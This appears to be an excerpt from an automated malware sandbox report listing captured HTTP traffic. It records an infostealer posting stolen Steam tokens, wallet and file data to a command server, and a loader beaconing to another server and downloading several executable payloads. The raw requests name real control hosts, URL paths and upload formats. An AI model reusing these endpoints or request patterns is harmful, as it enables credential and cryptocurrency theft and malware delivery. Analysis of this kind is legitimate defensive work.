                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIJEBAECGCBKECAAAEBHost: 185.215.113.206Content-Length: 6467Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKFCGIJKJKFHIDHIIIEHost: 185.215.113.206Content-Length: 991Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAEGHDGDBGDGDAAFIHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61 31 30 38 32 62 32 38 39 31 62 32 65 62 39 65 39 36 66 32 35 33 36 66 30 31 39 33 30 62 62 64 31 66 33 64 64 35 64 62 36 64 32 37 64 31 66 30 66 63 65 64 30 65 34 63 33 31 62 32 38 63 37 64 38 32 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 2d 2d 0d 0a Data Ascii: ------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="file"------AFHDAEGHDGDBGDGDAAFI--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHIDAKECFIEBGDHJEBHost: 185.215.113.206Content-Length: 3087Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGIHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61 31 30 38 32 62 32 38 39 31 62 32 65 62 39 65 39 36 66 32 35 33 36 66 30 31 39 33 30 62 62 64 31 66 33 64 64 35 64 62 36 64 32 37 64 31 66 30 66 63 65 64 30 65 34 63 33 31 62 32 38 63 37 64 38 32 34 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 2d 2d 0d 0a Data Ascii: ------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="file"------CGIDAAAKJJDBGCBFCBGI--
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKFHost: 185.215.113.206Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDAKFCGIJKJKFHIDHIIHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61 31 30 38 32 62 32 38 39 31 62 32 65 62 39 65 39 36 66 32 35 33 36 66 30 31 39 33 30 62 62 64 31 66 33 64 64 35 64 62 36 64 32 37 64 31 66 30 66 63 65 64 30 65 34 63 33 31 62 32 38 63 37 64 38 32 34 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 2d 2d 0d 0a Data Ascii: ------DHDAKFCGIJKJKFHIDHIIContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------DHDAKFCGIJKJKFHIDHIIContent-Disposition: form-data; name="message"wallets------DHDAKFCGIJKJKFHIDHII--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBKKJECAKEHJJJDBAFHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 4b 4a 45 43 41 4b 45 48 4a 4a 4a 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61 31 30 38 32 62 32 38 39 31 62 32 65 62 39 65 39 36 66 32 35 33 36 66 30 31 39 33 30 62 62 64 31 66 33 64 64 35 64 62 36 64 32 37 64 31 66 30 66 63 65 64 30 65 34 63 33 31 62 32 38 63 37 64 38 32 34 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 4b 4a 45 43 41 4b 45 48 4a 4a 4a 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 4b 4a 45 43 41 4b 45 48 4a 4a 4a 44 42 41 46 2d 2d 0d 0a Data Ascii: ------EBFBKKJECAKEHJJJDBAFContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------EBFBKKJECAKEHJJJDBAFContent-Disposition: form-data; name="message"files------EBFBKKJECAKEHJJJDBAF--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBKECAKFBGCAKECGIEHHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61 31 30 38 32 62 32 38 39 31 62 32 65 62 39 65 39 36 66 32 35 33 36 66 30 31 39 33 30 62 62 64 31 66 33 64 64 35 64 62 36 64 32 37 64 31 66 30 66 63 65 64 30 65 34 63 33 31 62 32 38 63 37 64 38 32 34 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 48 2d 2d 0d 0a Data Ascii: ------GCBKECAKFBGCAKECGIEHContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------GCBKECAKFBGCAKECGIEHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GCBKECAKFBGCAKECGIEHContent-Disposition: form-data; name="file"------GCBKECAKFBGCAKECGIEH--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBGDBFBKKJECBFHDGIEHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61 31 30 38 32 62 32 38 39 31 62 32 65 62 39 65 39 36 66 32 35 33 36 66 30 31 39 33 30 62 62 64 31 66 33 64 64 35 64 62 36 64 32 37 64 31 66 30 66 63 65 64 30 65 34 63 33 31 62 32 38 63 37 64 38 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 2d 2d 0d 0a Data Ascii: ------KFBGDBFBKKJECBFHDGIEContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------KFBGDBFBKKJECBFHDGIEContent-Disposition: form-data; name="message"ybncbhylepme------KFBGDBFBKKJECBFHDGIE--
                      Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61 31 30 38 32 62 32 38 39 31 62 32 65 62 39 65 39 36 66 32 35 33 36 66 30 31 39 33 30 62 62 64 31 66 33 64 64 35 64 62 36 64 32 37 64 31 66 30 66 63 65 64 30 65 34 63 33 31 62 32 38 63 37 64 38 32 34 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 2d 2d 0d 0a Data Ascii: ------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IDAKJKEHDBGHIDHIEHDB--
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 36 33 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007634001&unit=246122658369
                      Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                      Source: global trafficHTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 36 33 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007635001&unit=246122658369
                      Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 36 33 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007636001&unit=246122658369
                      Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJDGCGDAAKEBGDBKFHost: 185.215.113.206Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 42 43 34 45 46 33 32 41 37 44 35 34 37 38 32 34 35 32 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 2d 2d 0d 0a Data Ascii: ------IIDHJDGCGDAAKEBGDBKFContent-Disposition: form-data; name="hwid"2BC4EF32A7D547824525------IIDHJDGCGDAAKEBGDBKFContent-Disposition: form-data; name="build"mars------IIDHJDGCGDAAKEBGDBKF--
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 36 33 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007637001&unit=246122658369
                      Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                      Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 463Content-Type: multipart/form-data; boundary=------------------------aBOthCcEVYNEQrVxiiiql9Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 61 42 4f 74 68 43 63 45 56 59 4e 45 51 72 56 78 69 69 69 71 6c 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 75 63 65 76 65 79 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ee db 06 50 6b 92 7f 34 75 06 d6 8f 96 e0 83 6c 91 d2 2a 6d 7c 14 fe f8 78 fd 72 42 f9 13 30 18 a2 51 f2 dc 23 12 0e 4a 35 9a 4e 0f de 41 ad 54 b2 b6 2b ab 7d 2a d8 6c 0f 01 a4 cd 29 0d 47 b5 0c b6 09 d4 bc 4f ae ec be a6 2a e5 4e fc b0 b9 84 d5 7f 95 22 5e 3a fb 80 3a 49 4f d5 a3 6e 21 f7 fd 4e e9 2e a1 27 04 d9 c1 c3 c3 31 48 26 d4 3b b0 a4 5e 58 73 f9 c3 9f 92 bf 5b 97 dd 42 52 1e 71 9f de 56 7d 94 53 d2 1f 72 9e 44 7c 9f 1d ab cf 7e da 01 67 5e e1 48 1d 5d 63 e7 37 9c 2a f7 1a 9a 45 41 52 e4 dd 08 0a f4 86 5d 13 70 16 c8 66 c4 6b 60 0a c5 58 c8 78 e3 d7 f3 c4 bc 19 7f 38 fb c7 ac ef d1 ac 6e ba a1 c5 c2 88 13 23 a4 d1 82 4e 1b 80 dc 41 9c d2 bf 79 6c 31 fd 56 80 4a a4 f5 77 1c d6 63 27 47 0b 7e cb 53 12 a8 37 1f 2b 35 6c 11 fd 98 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 61 42 4f 74 68 43 63 45 56 59 4e 45 51 72 56 78 69 69 69 71 6c 39 2d 2d 0d 0a Data Ascii: --------------------------aBOthCcEVYNEQrVxiiiql9Content-Disposition: form-data; name="file"; filename="Hucevey.bin"Content-Type: application/octet-streamPk4ul*m|xrB0Q#J5NAT+}*l)GO*N"^::IOn!N.'1H&;^Xs[BRqV}SrD|~g^H]c7*EAR]pfk`Xx8n#NAyl1VJwc'G~S7+5l--------------------------aBOthCcEVYNEQrVxiiiql9--
                      Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 78227Content-Type: multipart/form-data; boundary=------------------------fcEwoLMqRrb1hatPvTvvxuData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 66 63 45 77 6f 4c 4d 71 52 72 62 31 68 61 74 50 76 54 76 76 78 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4e 6f 72 75 66 6f 70 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 2b fd f5 4e 7d 33 ef c0 50 0a a4 e8 76 69 19 43 1f 90 6e 9e 2c 56 35 b4 92 f2 ee 9d 3f bf 94 46 b8 93 a0 60 f9 07 3c ce ee 0e 65 c6 91 4f 34 f2 7c fb c9 8b 48 be b0 74 0d d1 86 57 dd 1c 7e a8 85 4e a1 fb f3 2e d1 4d fc 29 14 b1 d6 0d fb 06 d4 aa 41 67 61 9a d6 c4 d9 40 5c 0d dd 21 4f e4 fd d7 13 8a 9d 8c 95 ba 4e 33 1f 17 f1 d3 80 e9 c8 70 98 0e 07 92 89 fe a2 ec d8 88 1e 26 c9 1a a9 4a 01 da 4f 98 36 84 39 6c 03 0e 55 18 54 71 37 b1 2b 53 81 54 de 19 8f cb fe f8 8b 6c 64 7d 6c da 9c b6 b1 8a 09 8e 78 02 7e 28 69 d1 81 ac d7 04 92 ff 99 b3 6d aa 4a 70 55 23 57 ad 22 41 15 b2 8b fa 92 09 44 6e d6 3e 5f 2f fc a2 24 80 fe df a5 51 eb a7 3d b0 25 85 80 30 de bd 72 63 35 16 96 82 e9 fd 16 98 60 aa e3 dd 47 b7 22 3e 96 c1 9b cb 17 3f 09 67 c5 ff 24 c7 e3 9c 82 ae 7b 9c d3 06 8f c4 c2 0f 70 e8 a2 7e dc 0a d8 57 9e 4b db 51 13 b6 f0 c4 9e 76 5d c1 4a cc 19 ff e7 e1 1f c4 a4 d1 25 6f 2b 51 06 51 f1 01 d7 b6 b2 a8 19 8a 6c fd 82 52 d6 21 a8 4c d9 4c e7 a8 09 f4 37 29 38 20 c4 b9 c8 38 c9 4c d7 d3 6e 59 e8 be cc 5a 69 5b b7 d5 dd d3 78 78 61 43 81 7f 98 45 be d4 19 7c b6 5d 8e 93 9e 1d 12 5e dc e6 45 2f 98 f0 35 de 1e bd 98 74 13 98 77 77 3a 3e 18 20 a1 da 74 bd fd 9b 9f 3e b0 e9 16 36 8d 59 24 b1 0e 27 3d 07 c6 76 3b f2 b2 3d 4f 54 3e a4 4a 8d 05 4a 85 19 e6 d8 e6 5d 2d 0b 3c c6 83 11 f6 9f 5c c2 2b b6 f9 70 7e 87 3e 5f d9 af 07 a6 78 fd 3e 20 e6 a5 0d 86 cf 0b 40 ea d6 48 ce 9d 76 f5 c9 89 5d 08 6b cf 3b b0 c0 bf 9a 1d e6 da 24 aa ce 0b 98 66 9f e6 77 ad 50 df 6f 8d a1 e2 f3 24 c0 c6 3a 26 db dc ae e2 2a e1 d3 20 6e a9 89 41 ed ea 70 a3 3a 49 e8 c1 1d 96 62 b6 3d f6 5d 8e f2 12 cc 0b d6 9f de 95 ae c2 99 cb 83 36 ca 73 93 8b 2f 3d 88 f4 f3 e8 8e 6f 30 41 5c cf 41 7c 92 d8 be f6 d3 5b 50 c6 b9 eb 6d fc f4 d6 ca c1 47 38 42 fd eb 6d f1 78 b3 54 43 78 e2 c6 cc fd 7e 4d a4 fa 7d ba a4 13 6e ff 03 2b 57 f5 f8 8d e5 c6 99 a0 55 aa a8 0b 1d 3d 29 0d f8 50 69 1e 77 2e 71 25 e6 d5 62 b8 c2 59 2f e1 1c f7 12 e3 1f 7c c2 46 7f 3d 57 9d 5a d4 7d a1 0a 86 c8 af 9e 1f ec fc d9 de 4f 3d 4f 1f af e2 2a 1d 79 55 bf e0 e4 c5 4e ca ef f2 b6 c8 42 ee a9 5c 99 a6 7d 1d 07 ce a9 11 40 e8 8a 0c f5 65 23 82 9c 45 b4 e0 8b 09 ae 98 6f e5 9c a6 4a c3 a0 55 64 7e 2c 90 6e 14 0b 39 16 7f 76 0f 66 d1 06 8e b6 f5 aa ec dc f4 5c b8 2c d8 45 eb f4 0b 16 28 da d8 5b 0e 4f f3 4b 6c 26 07 94 30 42 b2 17 2f ce 9e fc 2f 92 3a b8 a9
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 36 33 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007638001&unit=246122658369
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
